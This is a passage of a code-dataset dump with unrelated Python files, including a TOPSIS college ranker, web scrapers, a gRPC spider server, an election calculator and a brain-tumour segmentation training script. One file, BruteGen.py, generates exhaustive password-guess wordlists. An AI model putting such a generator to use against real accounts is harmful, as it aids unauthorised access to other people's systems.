college.furtherStudyRate\n else:\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][1] = college.workRate\n\n def initializeColTwo(self):\n \"\"\"\n :return:\n \"\"\"\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][2] = college.schoolScore\n\n def initializeColThree(self):\n \"\"\"\n\n :return:\n \"\"\"\n print(\"请对以下地理位置进行排序 : \".center(25, \"*\"))\n locations = list(set([college.location for college in self.possibleColleges]))\n print(\"请选择 : \")\n print(locations)\n input()\n decisions = self.buildWeightMatrix(len(locations), 9)\n print(\"选择为 :\\r\\n\", decisions)\n weights = self.getWeightVector(decisions, len(locations))\n print(\"权重向量为 :\\r\\n\", weights)\n for row, location in enumerate(locations):\n for i, college in enumerate(self.possibleColleges):\n if college.location == location:\n self.rMatrix[i][3] = weights[row]\n\n def initializeColFour(self):\n \"\"\"\n 初始化第四行,clicks\n :return:\n \"\"\"\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][4] = college.totalClicks\n\n def initializeColFive(self):\n \"\"\"\n 学校的特色专业与热点行业之间的契合度\n :return:\n \"\"\"\n\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][5] = max(\n [college.getMostSimilarMajorValue(hotMajor) for hotMajor in uti.Majors.hotMajors])\n\n def buildWeightMatrix(self, n: int, bound=9):\n \"\"\"\n 生成 n*n 的正互反矩阵\n :param n:\n :return:\n \"\"\"\n mat = np.zeros((n, n))\n for row in range(n):\n for col in range(row, n):\n if row == col:\n mat[row][col] = 1.0\n else:\n t = random.randint(0, 1)\n if t:\n mat[row][col] = 1.0 * random.randint(1, bound)\n mat[col][row] = 1 / mat[row][col]\n else:\n mat[col][row] = 1.0 * random.randint(1, bound)\n mat[row][col] = 1 / mat[col][row]\n return mat\n\n def getWeightVector(self, mat: np.array, n):\n \"\"\"\n 获取 n*n 的正互反矩阵的权重向量\n :param mat:\n :param n:\n :return:\n \"\"\"\n vector = np.sum(mat, axis=1).reshape((-1, 1))\n vector = vector / n\n vector = self.normalizeMatrix(vector)\n return vector\n\n def normalizeMatrix(self, matrix):\n length = math.sqrt(np.sum(matrix ** 2))\n return matrix / length\n\n def calculate(self) :\n v = np.zeros((6, 6) )\n for i in range(6) :\n v[i][i] = self.weightVector[i]\n temp = self.rMatrix.dot(v)\n minVector = np.min(temp, axis=0)\n maxVector = np.max(temp, axis=0)\n print(\"temp is \\r\\n\", temp)\n print(\"minVector is \\r\\n\", minVector)\n print(\"maxVector is \\r\\n\", maxVector)\n ansList = []\n for row in range(self.collegeNumber) :\n vector = temp[row, :]\n D2Min, D2Max = self.getD1D2(minVector, maxVector, vector)\n k = D2Min / (D2Max + D2Min)\n ansList.append( (k, self.possibleColleges[row] ) )\n return ansList\n\n def getFinal(self, n : int) :\n ansList = self.calculate()\n t = sorted(ansList, key= lambda x : x[0],reverse=True)\n print(\"\\r\\n\", \"\".center(25, \"*\") )\n for e in t :\n print(str(e[0]), str(e[1]) )\n print(\"\\r\\n推荐的决策为 : \")\n for i in range(n) :\n print(str(i + 1).center(25, \"*\"))\n print(str(t[i][0]), str(t[i][1]))\n\n def getAns2(self) :\n for col in range(6) :\n tempList = []\n tempCol = self.rMatrix[ : , col]\n for row in range(self.collegeNumber) :\n tempList.append( (tempCol[row], row) )\n tempList = sorted(tempList, key= lambda x: x[0], reverse=True)\n print()\n if col == 0 :\n print(\"理想专业与学校特色专业的匹配度 : \".center(25, \"*\"))\n elif col == 1 :\n print(\"就业深造机会 : \".center(25, \"*\"))\n elif col == 2 :\n print(\"整体实力 : \".center(25, \"*\"))\n elif col == 3 :\n print(\"地理位置 : \".center(25, \"*\"))\n elif col == 4 :\n print(\"社会认可度 : \".center(25, \"*\"))\n elif col == 5 :\n print(\"学校专业与热门专业的契合度 : \".center(25, \"*\"))\n for i in range(10) :\n print(tempList[i][0], self.possibleColleges[tempList[i][1]].name)\n\n def getD1D2(self, minVector, maxVector, temp) :\n return (self.calculateDistance(minVector, temp), self.calculateDistance(maxVector, temp) )\n\n def calculateDistance(self, vector1, vector2) :\n delta = vector1 - vector2\n delta = delta ** 2\n sumDelta = np.sum(delta)\n return math.sqrt(sumDelta)\n\n def normalizeMatrixByCols(self, matrix : np.array) :\n \"\"\"\n 对矩阵的每个列进行归一化\n :param matrix:\n :return:\n \"\"\"\n for col in range(6) :\n colVector = matrix[: , col ]\n colVector = self.normalizeMatrix(colVector)\n for raw in range(self.collegeNumber) :\n matrix[raw][col] = colVector[raw]\n return matrix\n\n\n\n\n\n\n\n\n","sub_path":"2019校赛数模/group_a/Topsis.py","file_name":"Topsis.py","file_ext":"py","file_size_in_byte":13651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"612740912","text":"import requests\nfrom lxml import html\n\ndef main():\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'\n session = requests.session()\n session.headers.update({'user_agent':user_agent})\n initial_url = 'https://www.ligloo.fr/annonce-immobiliere/{0}.html#!/?page={1}&tri=pertinance'\n categories = ('STUDIO', 'LOFTS', 'MAISON', 'APPART-2-PIECES-MOINS-DE-40-M2')\n for category in categories:\n dictionary_of_links = {}\n for page in range(1, 6):\n url = initial_url.format(category, page)\n print(url)\n result = session.get(url)\n tree = html.fromstring(result.text) #why tree is the same every time?\n\nprint(main())\n","sub_path":"scrapy_projt/python_request_module_post/request_session_ecommerce.py","file_name":"request_session_ecommerce.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"630346444","text":"import adv_test\nimport adv\nfrom slot.d import *\n\ndef module():\n return Waike\n\n\nclass Waike(adv.Adv):\n comment = 'no bog'\n\n def d_slots(this):\n #this.conf.slot.d = DJ()\n return\n\n def prerun(this):\n if this.condition('c4+fs'):\n this.conf['acl'] = \"\"\"\n `s1, fsc\n `s2, fsc\n `s3, fsc\n `fs, seq=4\n \"\"\"\n\nif __name__ == '__main__':\n conf = {}\n conf['acl'] = \"\"\"\n `s1, seq=5 or fsc\n `s2, seq=5 or fsc\n `s3, seq=5 or fsc\n \"\"\"\n adv_test.test(module(), conf, verbose=0)\n\n","sub_path":"adv/waike.py","file_name":"waike.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"44592306","text":"from concurrent import futures\nimport os\nimport sys\nimport grpc\nimport json\n\ncurrent_path = os.path.realpath(__file__)\nroot_path = os.path.dirname(os.path.dirname(os.path.dirname(current_path)))\nsys.path.append(root_path)\n\nimport server.spider.spider_pb2 as spider_pb2\nimport server.spider.spider_pb2_grpc as spider_pd2_grpc\nfrom Logger import log\nfrom conf.conf import Config\nfrom server.spider.logic.zhihu import ZhihuClient\nfrom server.spider.logic.kuaishou import KuaishouClientV2\n\nconf = Config()\nzh_client = ZhihuClient(cookie=conf.zhihu_cookie)\n\nks_client = KuaishouClientV2()\n\n\nclass Spider(spider_pd2_grpc.SpiderServicer):\n def Zhihu(self, request, content):\n try:\n data = request.data\n data = json.loads(data)\n t = data.get('type', None)\n if t not in ['question', 'answer']:\n results = {'status_code': 400, 'message': 'invalid type'}\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n page = int(data.get('page', 1))\n if t == 'question':\n kw = data.get('kw', '')\n if not kw:\n results = {'status_code': 400, 'message': 'invalid kw'}\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n results, code = zh_client.search(type=t, kw=kw, page=page)\n if code != 200:\n results = {\n 'status_code': code,\n 'message': 'error happened'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n results = {'status_code': code, 'message': '', 'data': results}\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n elif t == 'answer':\n question_id = data.get('question_id', '')\n if not question_id:\n results = {\n 'status_code': 400,\n 'message': 'invalid question_id'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n results, code = zh_client.search(type=t,\n question_id=question_id,\n page=page)\n if code != 200:\n results = {\n 'status_code': code,\n 'message': 'error happened'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n results = {'status_code': code, 'message': '', 'data': results}\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n except Exception as e:\n msg = 'On line {} - {}'.format(sys.exc_info()[2].tb_lineno, e)\n log('Spider.Zhihu').logger.error(msg)\n return\n\n def Kuaishou(self, request, content):\n try:\n data = request.data\n data = json.loads(data)\n cookie = data.get('cookie', None)\n if cookie is None:\n results = {\n 'status_code': 400,\n 'message': 'cookie can not be none'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n t = data.get('type', None)\n if t == 'video':\n obj = data.get('user_id', None)\n elif t == 'search':\n obj = data.get('kw', None)\n elif t == 'comment':\n obj = data.get('video_id', None)\n else:\n obj = None\n if obj is None:\n results = {\n 'status_code': 400,\n 'message': 'obj can not be none'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n pcursor = data.get('pcursor', None)\n res, code = ks_client.getData(t=t,\n obj=obj,\n cookie=cookie,\n pcursor=pcursor)\n if code != 200:\n if code == 404:\n results = {\n 'status_code': code,\n 'message': 'error in requests'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n else:\n results = {\n 'status_code': code,\n 'message': 'error happened in code'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n else:\n results = {'status_code': code, 'message': '', 'data': res}\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n except Exception as e:\n msg = 'On line {} - {}'.format(sys.exc_info()[2].tb_lineno, e)\n log('Spider.Zhihu').logger.error(msg)\n results = {\n 'status_code': 400,\n 'message': msg,\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))\n spider_pd2_grpc.add_SpiderServicer_to_server(Spider(), server)\n server.add_insecure_port('[::]:50052')\n server.start()\n server.wait_for_termination()\n\n\nif __name__ == '__main__':\n serve()\n","sub_path":"server/spider/spider_server.py","file_name":"spider_server.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"432223971","text":"# Copyright 2017-2019 TensorHub, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport re\nimport logging\n\nlog = logging.getLogger(\"guild\")\n\nclass OutputScalars(object):\n\n def __init__(self, config, run):\n self._patterns, self._step_pattern = self._compile_patterns(config)\n self._run = run\n self._writer = None\n self._step = None\n\n @staticmethod\n def _compile_patterns(config):\n patterns = []\n step_pattern = None\n for key, val in sorted(config.items()):\n try:\n pattern = re.compile(val)\n except Exception as e:\n log.warning(\n \"error compiling pattern %s for \"\n \"output scalar %s: %s\", val, key, e)\n else:\n if pattern.groups != 1:\n log.warning(\n \"pattern %s captures %i group(s), \"\n \"expected 1 - skipping\", val,\n pattern.groups)\n continue\n if key == \"step\":\n step_pattern = pattern\n else:\n patterns.append((key, pattern))\n return patterns, step_pattern\n\n def write(self, line):\n self._refresh_step(line)\n for key, pattern in self._patterns:\n val = self._try_float(pattern, line)\n if val is not None:\n writer = self._ensure_writer()\n writer.add_scalar(key, val, self._step)\n\n def _refresh_step(self, out):\n if self._step_pattern:\n maybe_step = self._try_int(self._step_pattern, out)\n if maybe_step:\n self._step = maybe_step\n\n def _try_float(self, pattern, s):\n return self._gen_try(pattern, s, float)\n\n def _try_int(self, pattern, s):\n return self._gen_try(pattern, s, int)\n\n @staticmethod\n def _gen_try(pattern, s, type_conv):\n m = pattern.search(s.decode())\n if not m:\n return None\n try:\n return type_conv(m.group(1))\n except ValueError:\n return None\n\n def _ensure_writer(self):\n import tensorboardX\n if self._writer is None:\n run_guild_dir = self._run.guild_path()\n self._writer = tensorboardX.SummaryWriter(run_guild_dir)\n return self._writer\n\n def close(self):\n if self._writer:\n self._writer.close()\n","sub_path":"guild/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"158726781","text":"from MyModules import InputValidator\r\n\r\n\r\ndef calcPercent(total, part):\r\n\treturn (part/total)*100\r\n\r\n# Holds the candidate information\r\n# Candidates will be accessed by CANDIDATE[NAME][VOTES]\r\nCANDIDATES = []\r\nCANDIDATE_NAME = 0\r\nCANDIDATE_VOTES = 1\r\n\r\n# Input and message constants\r\nENTER_CANDIDATES_INPUT = \"Enter the number of candidates in the election:\"\r\nENTER_CANDIDATE_NAME = \"Enter the name of candidate #{}: \"\r\nENTER_CANDIDATES_VOTE = \"Enter the number of votes for {}: \"\r\n\r\nRESULTS\t\t\t\t\t= \"{} : {:.0f}% {}\"\r\nRESULT_PADDING = 25\r\nLOSE_MESSAGE\t\t\t= \"Lowest total votes\"\r\nWIN_MESSAGE\t\t\t\t= \"Winner!\"\r\nNEUTRAL_MESSAGE\t\t\t= \"\"\r\nERROR_MESSAGE = \"Oops! That's not a valid value\"\r\nLINE_BREAK = \"----------------------------------------\"\r\n\r\nprint(\"Welcome to Gigi's Election Calculator!\")\r\n\r\n# Determine the number of candidates\r\nnumCandidate = input(ENTER_CANDIDATES_INPUT)\r\nwhile InputValidator.isInt(numCandidate) == False or int(numCandidate) <= 0:\r\n print(ERROR_MESSAGE)\r\n numCandidate = input(ENTER_CANDIDATES_INPUT)\r\nnumCandidate = int(numCandidate)\r\n\r\n# Holds the total number of votes\r\ntotalVotes \t= 0\r\nhighest \t= 0\r\nlowest \t\t= 0\r\n\r\n# Collect the required amount of candidates\r\nfor i in range(1, numCandidate+1):\r\n # Get the candidates name\r\n name = input(ENTER_CANDIDATE_NAME.format(i))\r\n\r\n # Get the number of votes for the candidate\r\n votes = input(ENTER_CANDIDATES_VOTE.format(name))\r\n while InputValidator.isInt(votes) == False or int(votes) < 0:\r\n print(ERROR_MESSAGE)\r\n votes = input(ENTER_CANDIDATES_VOTE)\r\n votes = int(votes)\r\n totalVotes += votes\r\n\r\n if lowest == 0:\r\n lowest = votes\r\n elif votes < lowest:\r\n lowest = votes\r\n\r\n if highest < votes:\r\n highest = votes\r\n\r\n # Add the candidates name and number of votes to the candidates array\r\n CANDIDATES.append([name,votes])\r\n print()\r\n\r\n\r\nprint(LINE_BREAK)\r\n\r\n\r\n# Print the results of the election, and set the winning message\r\nfor candidate in CANDIDATES:\r\n if candidate[CANDIDATE_VOTES] == lowest:\r\n result = LOSE_MESSAGE\r\n elif candidate[CANDIDATE_VOTES] == highest:\r\n result = WIN_MESSAGE\r\n else:\r\n result = NEUTRAL_MESSAGE\r\n\r\n\t# Print the results with formatting applied in the format string\r\n print(RESULTS.format(candidate[CANDIDATE_NAME].ljust(RESULT_PADDING, \" \"), calcPercent(totalVotes, candidate[CANDIDATE_VOTES]), result))\r\n","sub_path":"Assignment3/Election.py","file_name":"Election.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"30603336","text":"import msvcrt\r\n\r\ngen = 0\r\n\r\ndef generar(dic,cnt,pref):\r\n global gen\r\n if msvcrt.kbhit():\r\n char = msvcrt.getwch()\r\n if (char == '\\x1b'):\r\n raise ValueError(\"Se ha parado la generación.\")\r\n if cnt == 0:\r\n f.write(pref+\"\\n\")\r\n gen += 1\r\n if (gen == int(lines*0.1)):\r\n print(\"10%\")\r\n print()\r\n elif (gen == int(lines*0.2)):\r\n print(\"20%\")\r\n print()\r\n elif (gen == int(lines*0.3)):\r\n print(\"30%\")\r\n print()\r\n if (gen == int(lines*0.4)):\r\n print(\"40%\")\r\n print()\r\n elif (gen == int(lines*0.5)):\r\n print(\"50%\")\r\n print()\r\n elif (gen == int(lines*0.6)):\r\n print(\"60%\")\r\n print()\r\n if (gen == int(lines*0.7)):\r\n print(\"70%\")\r\n print()\r\n elif (gen == int(lines*0.8)):\r\n print(\"80%\")\r\n print()\r\n elif (gen == int(lines*0.9)):\r\n print(\"90%\")\r\n print()\r\n else:\r\n for char in dic:\r\n generar(dic, cnt-1, pref+char)\r\n\r\ndef elevar(b,e):\r\n res = b\r\n for i in range(0,e-1):\r\n res *= b\r\n return res\r\n\r\nf = open(\"pswds.txt\", \"w\")\r\n\r\n\r\n\r\nmini = int(input(\"Número mínimo de caracteres: \"))\r\nmaxi = int(input(\"Número máximo de caracteres: \"))\r\nchars = input(\"Caracteres a usar: \")\r\ndic = []\r\n\r\nfor c in chars:\r\n if not (c in dic):\r\n dic.append(c)\r\ndic.sort()\r\n\r\nlines = dskSpc = 0\r\n\r\nfor i in range(mini,maxi+1):\r\n lines += elevar(len(dic), i)\r\n dskSpc += ((lines * (i+2))-3) * 0.0000009488103185\r\n\r\ndskSpc = str(dskSpc)\r\n\r\ngo = input(\"Se van a generar \" + str(lines) + \" combinaciones que ocuparán \" + dskSpc[:dskSpc.find(\".\")+3] + \"MB. ¿Quieres continuar? (S/N) \")\r\n\r\nwhile (go != 's' and go != 'S' and go != 'n' and go != 'N'):\r\n go = input(\"Esa no es una opción válida, vuelve a introducir: \")\r\n\r\nif (go == 's' or go == 'S'):\r\n print(\"En caso de querer parar la ejecución pulsa la tecla ESC.\")\r\n try:\r\n for i in range(mini,maxi+1):\r\n generar(dic,i,\"\")\r\n print(\"Se han generado todas las combinaciones.\")\r\n except ValueError as e:\r\n print(e)\r\n f.close()\r\n\r\nf.close()\r\nif (go == 'n' or go == 'N'):\r\n print(\"Fin del programa.\")","sub_path":"BruteGen.py","file_name":"BruteGen.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"185227362","text":"import tensorflow as tf \nfrom tensorflow import keras\n\n\ndef networkRecorder(logdir, model, input_shape):\n @tf.function\n def forward(model, x): return model(x)\n x = tf.zeros(input_shape)\n writer = tf.summary.create_file_writer(logdir)\n tf.summary.trace_on(graph=True, profiler=True)\n forward(model, x)\n with writer.as_default():\n tf.summary.trace_export(name='model_trace', step=0, profiler_outdir=logdir)\n\n\nif __name__ == '__main__':\n from datetime import datetime\n from resnet import resnet50\n stamp = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n logdir = '.\\logs\\%s' % stamp\n shape = [1, 224, 224, 3]\n networkRecorder(logdir, resnet50(), shape)\n","sub_path":"visual_network.py","file_name":"visual_network.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"396041032","text":"def isValid(self, s: str) -> bool:\n stack=[\"?\"]\n mapping = {\"(\": \")\", \"[\": \"]\", \"{\": \"}\", \"?\": \"?\"}\n for i in s:\n if i in mapping:\n stack.append(i)\n continue\n elif mapping[stack.pop()]!=i:\n return False\n\n return len(stack) ==1\n\n# 字典存好三种括号,键值对","sub_path":"Week_01/有效的括号.py","file_name":"有效的括号.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"526981537","text":"# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\nfrom datetime import datetime\nfrom typing import Iterator, Optional\n\n# noinspection PyPackageRequirements\nfrom grpc import RpcError, StatusCode\n\nfrom ... import LOG\nfrom .pb_parse_event import to_datetime\n\n\ndef maybe_grpc_time_stream(time_service: 'G.TimeServiceStub', ledger_id: str) \\\n -> Optional[Iterator[datetime]]:\n \"\"\"\n Return an iterator over times that monotonically increases, or ``None`` if the TimeService is\n not implemented by the remote server.\n\n :param time_service:\n :param ledger_id:\n :return:\n \"\"\"\n from . import model as G\n request = G.GetTimeRequest(ledger_id=ledger_id)\n\n time_stream = time_service.GetTime(request)\n try:\n return _TimeStream(time_stream)\n except StaticTimeUnsupportedError:\n LOG.debug('Operating in real-time mode.')\n return None\n\n\nclass _TimeStream(Iterator[datetime]):\n\n def __init__(self, time_stream):\n try:\n self.time_stream_iter = iter(time_stream)\n self.time_queue = [to_datetime(next(self.time_stream_iter).current_time)]\n except RpcError as ex:\n status_code = ex.code()\n if status_code == StatusCode.UNIMPLEMENTED:\n raise StaticTimeUnsupportedError()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n try:\n return self.time_queue.pop()\n except IndexError:\n pass\n\n try:\n dt = to_datetime(next(self.time_stream_iter).current_time)\n LOG.debug('Got a new time: %s', dt)\n return dt\n except RpcError as ex:\n status_code = ex.code()\n if status_code == StatusCode.CANCELLED:\n # a cancelled code is fine; that just means the underlying time stream connection is\n # closed (which also means this function is done with its work)\n raise StopIteration\n else:\n raise\n\n\nclass StaticTimeUnsupportedError(Exception):\n pass\n","sub_path":"python/dazl/protocols/v1/grpc_time.py","file_name":"grpc_time.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"49906834","text":"#!/usr/bin/env python3 -B\nimport unittest\nimport os\nimport os.path\nimport hashlib\nimport json\nimport uuid\nimport pprint\n\nfrom tests import TestWriter, SalesTestPipeline, MODELS\nfrom cromulent import vocab\n\nvocab.add_attribute_assignment_check()\n\nclass TestSalesPipelineOutput(unittest.TestCase):\n '''\n Parse test CSV data and run the Provenance pipeline with the in-memory TestWriter.\n Then verify that the serializations in the TestWriter object are what was expected.\n '''\n def setUp(self):\n self.catalogs = {\n 'header_file': 'tests/data/sales/sales_catalogs_info_0.csv',\n 'files_pattern': 'tests/data/sales/sales_catalogs_info.csv',\n }\n self.contents = {\n 'header_file': 'tests/data/sales/sales_contents_0.csv',\n 'files_pattern': 'tests/data/sales/sales_contents_1.csv',\n }\n self.auction_events = {\n 'header_file': 'tests/data/sales/sales_descriptions_0.csv',\n 'files_pattern': 'tests/data/sales/sales_descriptions.csv',\n }\n os.environ['QUIET'] = '1'\n\n def tearDown(self):\n pass\n\n def run_pipeline(self, models, input_path):\n writer = TestWriter()\n pipeline = SalesTestPipeline(\n writer,\n input_path,\n catalogs=self.catalogs,\n auction_events=self.auction_events,\n contents=self.contents,\n models=models,\n limit=10,\n debug=True\n )\n pipeline.run()\n return writer.processed_output()\n\n def verify_auction(self, a, event, idents):\n got_events = {c['_label'] for c in a.get('part_of', [])}\n self.assertEqual(got_events, {f'Auction Event {event}'})\n got_idents = {c['content'] for c in a.get('identified_by', [])}\n self.assertEqual(got_idents, idents)\n\n def test_pipeline_sales(self):\n input_path = os.getcwd()\n models = MODELS\n output = self.run_pipeline(models, input_path)\n\n objects = output['model-object']\n los = output['model-lo']\n people = output['model-person']\n prov = output['model-activity']\n activities = output['model-sale-activity']\n groups = output['model-groups']\n AUCTION_HOUSE_TYPE = 'http://vocab.getty.edu/aat/300417515'\n houses = {k: h for k, h in groups.items()\n if h.get('classified_as', [{}])[0].get('id') == AUCTION_HOUSE_TYPE}\n\n self.assertEqual(len(people), 4, 'expected count of people') # 3 from the data, and 1 (Lugt) which is a static instance\n self.assertEqual(len(objects), 6, 'expected count of physical objects')\n self.assertEqual(len(los), 10, 'expected count of linguistic objects')\n self.assertEqual(len(prov), 2, 'expected count of prov entries') # 2 prov entries\n self.assertEqual(len(activities), 3, 'expected count of sale activities') # 1 auction event, 2 auctions of lot\n self.assertEqual(len(houses), 1, 'expected count of auction houses')\n\n object_types = {c['_label'] for o in objects.values() for c in o.get('classified_as', [])}\n self.assertEqual(object_types, {'Auction Catalog', 'Painting'})\n\n lo_types = {c['_label'] for o in los.values() for c in o.get('classified_as', [])}\n self.assertEqual(lo_types, {'Auction Catalog', 'Catalog', 'Entry', 'Database', 'Electronic Records'})\n\n people_names = {o['_label'] for o in people.values()}\n self.assertEqual(people_names, {'Frits Lugt', '[Anonymous]', 'GILLEMANS, JAN PAUWEL', 'VINCKEBOONS, DAVID'})\n\n key_119 = 'tag:getty.edu,2019:digital:pipeline:REPLACE-WITH-UUID:sales#AUCTION,B-A139,0119,1774-05-31'\n key_120 = 'tag:getty.edu,2019:digital:pipeline:REPLACE-WITH-UUID:sales#AUCTION,B-A139,0120,1774-05-31'\n\n auction_B_A139_0119 = activities[key_119]\n self.verify_auction(auction_B_A139_0119, event='B-A139 (1774-05-31 onwards)', idents={'0119[a]', '0119[b]', 'Auction of Lot B-A139 0119 (1774-05-31)'})\n\n auction_B_A139_0120 = activities[key_120]\n self.verify_auction(auction_B_A139_0120, event='B-A139 (1774-05-31 onwards)', idents={'0120', 'Auction of Lot B-A139 0120 (1774-05-31)'})\n\n house_ids = {o['id'] for o in houses.values()}\n house_types = {c['_label'] for o in houses.values() for c in o.get('classified_as', [])}\n self.assertEqual(house_types, {'Auction House (organization)'})\n\n offer_labels = {p['_label'] for p in prov.values()}\n self.assertEqual(offer_labels, {'Offer of B-A139 0119 (1774-05-31)', 'Offer of B-A139 0120 (1774-05-31)'})\n\n events = [activities[k] for k in activities if k not in {key_119, key_120}]\n event_labels = {e['_label'] for e in events}\n self.assertEqual(event_labels, {'Auction Event B-A139 (1774-05-31 onwards)'})\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_sales_pipeline.py","file_name":"test_sales_pipeline.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"1690523","text":"\n#%%\nfrom brats_data_loader import get_list_of_patients, get_train_transform, iterate_through_patients, BRATSDataLoader, get_train_transform_aggro\nfrom train_test_function import ModelTrainer\nfrom models import AlbuNet3D34, AlbuNet3D34_4channels\nfrom loss import GeneralizedDiceLoss, SimpleDiceLoss, dice_multi_class, dice\n\nfrom batchgenerators.utilities.data_splitting import get_split_deterministic\nfrom batchgenerators.dataloading import MultiThreadedAugmenter\n\n\n#%%\nimport torch\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0,1\"\n\n#%%\n# videos.py\nimport argparse\nparser = argparse.ArgumentParser(description='Train AlbuNet3D')\nparser.add_argument('-name', type=str, help='Name of the Model')\nparser.add_argument('--batch_size', type=int, help='Batch Size', default=12)\nparser.add_argument('--patch_depth', type=int, help='Depth of the Input Patch', default=24)\nparser.add_argument('--patch_width', type=int, help='Width of the Input Patch', default=128)\nparser.add_argument('--patch_height', type=int, help='Height of the Input Patch', default=128)\nparser.add_argument('--training_max', type=int, help='max number of patients for training', default=369)\nparser.add_argument('--training_batch_size', type=int, help='Size of minibatch in training', default=100)\nparser.add_argument('--validation_batch_size', type=int, help='Size of minibatch in validation', default=100)\nparser.add_argument('--num_channels', type=int, help='Number of input channels', default=4)\nparser.add_argument('--no_pretrained', dest='pretrained', action='store_false', help='ResNet34 without Pretraining')\nparser.set_defaults(pretrained=True)\nparser.add_argument('--brats_train_year', type=int, help='BRATS Train Dataset Year', default=20)\nparser.add_argument('--brats_test_year', type=int, help='BRATS Test Dataset Year', default=20)\nparser.add_argument('--no_validation', dest='use_validation', action='store_false', help='No Validation Set')\nparser.set_defaults(use_validation=True)\nparser.add_argument('--weight_init', dest='weight_init', action='store_false', help='Initialize weight for 4 channel AlbuNet?')\nparser.set_defaults(weight_init=True)\nparser.add_argument('--learning_rate', type=float, help='Learning Rate', default=1e-3)\nparser.add_argument('--epochs', type=int, help='Number of Training Epochs', default=50)\nparser.add_argument('--aggro_da', dest='aggro_da', action='store_true', help='Use more aggressive data augs')\nparser.set_defaults(aggro_da=False)\nparser.add_argument('--no_gpu', dest='use_gpu', action='store_false', help='Use CPU instead of GPU')\nparser.set_defaults(use_gpu=True)\nparser.add_argument('--no_multiclass', dest='multi_class', action='store_false', help='Tumor Core Only')\nparser.set_defaults(multi_class=True)\nparser.add_argument('--seed', type=int, help='PyTorch Seed for Weight Initialization', default=1234)\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\n\nimport logging\nlogging.basicConfig(filename=args.name + '.log',level=logging.DEBUG)\n\nlogging.info('Starting logging for {}'.format(args.name))\nlogging.info(f\"Training for: {args.epochs}\")\n\n# Training data\npatients = get_list_of_patients('brats_data_preprocessed/Brats{}TrainingData'.format(str(args.brats_train_year)))\npatients = patients[0:args.training_max]\nprint(f\"The number of training patients: {len(patients)}\")\n\nbatch_size = args.batch_size\npatch_size = [args.patch_depth, args.patch_width, args.patch_height]\n\nif args.num_channels == 3:\n in_channels = ['t1c', 't2', 'flair']\n\nelif args.num_channels == 4:\n in_channels = ['t1', 't1c', 't2', 'flair']\n\n\n#%%\n# num_splits=5 means 1/5th is validation data!\npatients_train, patients_val = get_split_deterministic(patients, fold=0, num_splits=5, random_state=args.seed)\n\nif not args.use_validation:\n patients_train = patients\n\n#%%\ntrain_dl = BRATSDataLoader(\n patients_train,\n batch_size=batch_size,\n patch_size=patch_size,\n in_channels=in_channels\n)\n\nval_dl = BRATSDataLoader(\n patients_val,\n batch_size=batch_size,\n patch_size=patch_size,\n in_channels=in_channels\n)\n#%%\n\nif 